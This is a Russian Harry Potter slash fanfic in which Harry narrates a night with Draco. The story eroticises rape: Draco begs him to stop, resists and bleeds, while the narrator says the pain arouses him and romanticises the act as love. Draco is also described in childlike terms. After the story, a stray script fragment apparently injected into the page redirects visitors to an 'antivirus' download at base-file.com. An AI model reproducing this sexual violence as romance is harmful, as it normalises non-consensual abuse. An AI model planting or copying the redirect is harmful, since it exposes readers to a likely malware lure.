Боль

Автор: Эсси Эргана
Бета: Моэри
Pairing: Гарри/Драко
Rating: NC-17
Категория: slash
Жанр: pwp
Краткое содержание: они дарят друг другу любовь и боль...
Архивация: только с разрешения автора.

Посвящается Моэри

Я захожу в твою спальню. Одеяло отброшено в сторону, руки судорожно вцепились в шелковые простыни. Ты спишь… Твоя кожа поблескивает в лунном свете - на ней выступили крошечные капельки пота. Я знаю, тебе снится страшный сон - очередной кошмар из бесконечной череды ужасов, преследующих тебя все последние годы.

- Драко… - ты должен проснуться. - Мальчик мой…

Вздрагивает хрупкое тело. Распахиваются серые глаза. Испуганные. Почти потрясенные.

- Всё хорошо…

Я протягиваю руку и касаюсь твоих волос, убирая со лба непослушные пряди. Твое лицо влажное и теплое.

- Гарри? - ты облегченно вздыхаешь. - Гарри…

- Кошмар?

- Да… - ты привстаешь на кровати и почти падаешь ко мне на колени. - Я так устал… Ты не пришел…

Обнимаю тебя за плечи и легонько дышу тебе в ушко.

- Я просто хотел еще выпить чаю. Ты быстро заснул. Сегодня был трудный день, да?

Ты киваешь и всхлипываешь одновременно, уткнувшись носом мне в колени.

- Всегда…

- Что?

- …не могу спать спокойно, когда тебя нет… прости…

Внутри меня что-то сжимается от грусти и страха за него. Я знаю, что смогу защитить его от целого мира, если потребуется - но как мне уничтожить ту боль, что терзает его изнутри?

- Ну что ты… солнышко… не извиняйся, никогда, я должен был быть рядом, знаю, просто я не… всё будет хорошо, правда… обещаю…

Ты дрожишь, не смотришь на меня…

Осторожно беру в ладони твое лицо и заставляю тебя перевернуться на спину. Ты лежишь у меня на коленях, твои серебристые волосы растрепались, а глаза утонули в слезах. Почти не дыша, наклоняюсь и целую твои ресницы… Розовые губы, словно цветок, раскрываются мне навстречу в ожидании… Я знаю твой вкус… сладкий и нежный… провожу языком по контуру твоих губ, успокаивающе и дразняще одновременно.

Вздох.

- Гарри… почему я…

- Тшш… - накрываю пальцами его рот. - Не надо… Я люблю тебя…

Вокруг моей шеи обвиваются красивые руки. Я обнимаю тебя за талию и перекладываю на кровать… Губы касаются твоей щеки… Мой Драко… Как хочется вжаться в твое тело, слиться с тобой - сразу, не раздумывая ни секунды! Но ты жаждешь ласки и успокоения, и я покрываю твою шею тысячами поцелуев, пока не чувствую, как тепло, разливающееся по твоему телу, охватывает и меня… Ты снова чуть заметно вздыхаешь…

- Что, Драко?

- Останься…

Я поднимаю голову и слегка улыбаюсь.

- А ты как думал? Конечно, останусь!

Наконец и на твоем лице появляется легкая улыбка. Изящные пальцы расстегивают одну за другой пуговицы на моей рубашке. Я не могу больше ждать, ты так мучаешь меня! Я запускаю руки под твою пижаму и прижимаюсь к тебе всем телом… Легкий вскрик.

- Гарри, не так сильно…

Отталкивая твои дразнящие руки от груди, я почти вдавливаю тебя в кровать, игнорируя все мольбы. Вцепляюсь зубами в маленькое ушко, покусывая и посасывая его одновременно.

- Гарри…

Я шумно выдыхаю тебе в шею.

- Ты же хочешь, чтобы я помог тебе успокоиться? Я просто хочу быть ближе к тебе…

Мой язык медленно прорисовывает все синие жилочки на твоей шее, и ты чуть вздрагиваешь при каждом прикосновении. Я наблюдаю за тобой. Удивительно, как розовеет кожа на твоих щеках, словно ты все еще смущаешься нашей любви - после всех тех ночей, что мы провели вместе. Мне нравится это. Ты похож на маленького ребенка в моих руках. По-детски наивные глаза, которые утром снова станут мудрыми… и печальными. Я люблю растворяться в них во время наших занятий любовью - как моя плоть растворяется в твоем горячем и жаждущем теле.

- Ах.. - ты судорожно откидываешь голову на подушку, когда я касаюсь твоих сосков. - Гарри, пожалуйста…

Я знаю, что теперь уже ты хочешь, чтобы я поскорее прекратил сладостную пытку и овладел тобой. Но в глубине души мне всегда нравилось терзать тебя - нравилось просто до безумия. Нет, я не сделаю того, чего желаешь ты. Всё должно быть по-моему, мальчик. Только так. Твой правый сосок меж моих губ напряжен, когда я почти лениво засасываю его, вызывая протяжный и громкий стон из твоей груди. Тебе это нравится? А так? Я смыкаю зубы и знаю, что теперь ты стонешь не только от наслаждения, но и от боли. Ты почти плачешь, когда я быстрыми укусами покрываю твою грудь, оставляя многочисленные красные отметины. Мне нравится терзать твою нежную, бледную кожу, я обожаю ее сладкий абрикосовый вкус…

Не думая уже ни о чем, кроме необходимости слиться с тобой, я срываю с тебя пижаму. Ты отчаянно сопротивляешься, словно чувствуешь, что сегодня я еще больше полон боли, чем ты сам. Пальцы грубо скользят по подтянутому животу, задерживаются на бедрах, почти яростно впиваются в ягодицы…

- Гарри, нет! - вскрикиваешь ты, уже пугаясь моего напора, но я не позволяю тебе сдвинуться с места, вновь ложась сверху. Я чувствую, как ладони тонут в мягкой плоти, причиняя тебе новую боль. Горячие слезинки скатываются по твоим щекам, и вот уже прекрасное, столь любимое мной лицо сияет в лунном свете, залитое твоими страданиями… Как мне дороги эти мгновения! Ты мой - и в муках, и в удовольствии, - и я твой бог, дарящий тебе весь мир в вулкане эмоций.

- Ну пожалуйста… Гарри… остановись, Гарри… а-а… не-еет… - стонешь ты, захлебываясь в слезах, когда я сильно прикусываю кожу на шее, а потом почти по-животному слизываю соленые капельки с твоего лица. Я хочу впитать их в себя, как через несколько минут буду впитывать твое тело - до мельчайшей клеточки, до последнего кусочка.

- Драко…

Словно прислушиваясь к моему голосу, ты вдруг умолкаешь.

- Драко… - почти вкрадчиво. - Ты ведь не боишься меня, правда?

- Нет.. - вздыхаешь ты, борясь с дрожью в голосе и теле.

- Знаю… мы уже ничего не боимся, правда?

Я чувствую иронию в собственном голосе.

- Да… ничего…

Избавляясь от давно ставшей ненужной одежды, я знаю, что сейчас сотру из твоего сознания последние страхи - все кошмары и воспоминания. Пусть ненадолго, пусть даже лишь на мгновение - но я так хочу заполнить всё твое существование, не оставляя тебе возможности ни для каких посторонних мыслей и чувств. Потому что я живу так с тех пор, как впервые коснулся твоих губ. Потому что ты уничтожил во мне всё, чтобы возродить истерзанную душу на пустом месте, дать ей новую силу и дыхание.

Резко я развожу твои ноги в стороны, устраиваясь между ними. Тебя трясет, ты что-то говоришь полушепотом-полустоном. Какая разница? Теперь уже это не важно. Слегка приподняв тебя, я грубо вталкиваю в тебя свой член, и дикий крик прорезает тишину нашей спальни. О, как я ждал этого!

Погружаясь в твое тело, двигаясь с каждым разом все быстрее и быстрее, я слышу собственные судорожные стоны… ты обнимаешь меня и плачешь… горячая жидкость стекает по твоим бедрам, и я знаю, что это кровь… как странно, сейчас мысль о том, что я разрываю это маленькое хрупкое тело, просто невероятно возбуждает меня…

Нас обоих уничтожали день за днем. Уничтожали те, кто нас любил и ненавидел. Были ли они в состоянии понять, на какой ад обрекали двух детей, заставляя принимать ту или иную сторону в кошмарной войне, которая не была нужна никому из нас? на какие жертвы обрекали наши истерзанные души? Мы привыкли причинять боль. И мы привыкли ее принимать. Даже сейчас, когда всё было кончено, мы с Драко не можем перестать играть свои роли… Я знаю, что утром мой маленький мальчик снова превратится в едкого сноба, который каждым словом будет ранить меня в самое сердце. И я тоже приму это, потому что уже не умею жить иначе…

Но сейчас, когда я грубо беру тебя, Драко, я - твой хозяин. Ты подчиняешься моим движениям, впитываешь мое семя, ты боишься и хочешь меня…

Изящные пальцы вдруг впиваются мне в спину, ты выгибаешься и громко стонешь…. Я знал, что тебе это тоже понравится….

Нежный поцелуй.

Шепот.

Я люблю тебя…

P.S.

- Мы уже ничего не боимся, правда?

- Да… ничего…

- Ничего…

На самом деле это ложь.

Я всегда боюсь, что однажды проснусь и не найду тебя рядом. Я боюсь пустой и холодной постели, потому что она для меня - это и есть моя смерть. Я похоронен в тоске и тишине своих темных мыслей, когда тебя нет.

Мы делим нашу боль и рождаем в ней счастье. Возможно ли такое? Спросите у моих губ, покрывающих поцелуями его тело, спросите у моих рук, ласкающих каждый дюйм его кожи… Я с ним, я в нем… И иногда мне кажется, что больше уже ничего не нужно….

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>